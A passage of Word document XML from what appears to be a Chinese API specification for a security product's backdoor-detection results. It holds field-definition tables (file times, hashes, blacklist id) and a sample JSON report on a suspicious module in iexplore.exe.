        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7DB7CC51" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>32/64/空 表示 32位文件，64位文件，空未知</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="218DF06D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4963D53C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>f_ctime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15F83F28" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F9BABA2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42145858" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件create time</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="642D0358" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D4D51E0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>f_mtime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A4AD4C4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23D14D9A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F9AE417" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件modify time</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="70FBBC42" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DE641A1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>f_atime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75707E39" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77A74E82" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="687BD087" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件access time</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7A3FBD71" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04721B6D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>md5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2892EA5C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27358305" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4AF0281D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>全文md5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6E705101" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A53A13E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>sha1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="755DB7D7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="276297BC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C63DF0B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>全文sha1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="70B6C08A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65E0936A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>sha256</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="738433AE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31BF82D0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B0A2EEB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>全文sha256</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="65511786" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E055FCD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>code_section_md5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F390415" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="695E4D7A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61CF35D5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>代码段MD5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7049161B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73006623" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>code_section_sha1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="715B5395" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57A27988" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F1D40BC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>代码段sha1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6ABC60A7" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3EE1F149" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>code_section_sha256</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CF25183" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="772E002E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3AC9CCA3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>代码段sha256</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5B3D9408" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57D4E5E5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>black_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D846C5E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C3E1462" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74A0E351" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>黑名单id (默认0)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6464EF9D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F494BC8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "module_info": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "module_path": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "signature": "Microsoft Corporation",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "module_base_str": "0x1150000",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "load_time": 1527218501,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "module_size": 819200,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "module_type": 2,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "module_md5": "5f1b1148c830c0f149a476a58ce0d09d",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "load_reason": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "module_base": 18153472,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "module_name": "iexplore.exe"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "thread_info": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "start_address": 1962227952,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "create_time": 1527218503,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "wait_reason": 6,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "mem_type": "MEM_IMAGE",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        "state": 5,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "thread_id": 1860,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "mem_protect": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "EXECUTE_READ"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "start_address_str": "0x74F538F0",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "f_size"=100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "f_user"="",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "f_type"="32",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "f_ctime"=100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "f_mtime"=100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "f_atime"=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black_id" = 0</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "process_info": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "process_name": "iexplore.exe",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "signature": "Microsoft Corporation",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "parent_process_id": 2168,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        "create_time": 1527218501,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "b_wow64": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "process_id": 2736,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "b_64bit": false,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "image_file_name": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "parent_process_name": "iexplore.exe",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "f_size"=100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "f_user"="",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "f_type"="32",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "f_ctime"=100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "f_mtime"=100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "f_atime"=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black_id" = 0</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "ret_code": "0x00000010"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09ECE0CC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="252" w:name="后门类型可疑模块"/>
      <w:bookmarkEnd w:id="248"/>
      <w:bookmarkEnd w:id="251"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>后门类型：可疑模块</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F789ADE"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1793"/>
        <w:gridCol w:w="828"/>
        <w:gridCol w:w="1315"/>
        <w:gridCol w:w="3240"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="0A7C094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0DA2FA9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D632748" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1FE6DA89" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="765A8A64" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="364EB6DA" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="537BBDE1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ret_code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D305494" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52298490" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1DCF5724" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>返回code</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7A2BF759" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04C99A92" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>extend_ret_code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="453B908E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1925764C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D380BDD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>返回扩展code</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="35CA568D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03BCF7EA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>process_info</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="037F72C0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B61DFB4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04CFDFD3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>进程信息，</w:t>
            </w:r>
            <w:hyperlink w:anchor="processinfo数据结构">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="af6"/>
                </w:rPr>
                <w:t>process_info数据结构</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5D35F7C7" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E674234" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>module_info</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A639CB5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A7FA118" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D5411A7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>模块信息，</w:t>
            </w:r>
            <w:hyperlink w:anchor="moduleinfo数据结构">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="af6"/>
                </w:rPr>
                <w:t>module_info数据结构</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7A6F6B66" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F782DA7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "ret_code": "0x00000100",</w:t>
      </w:r>
      <w:r>
        <w:br/>
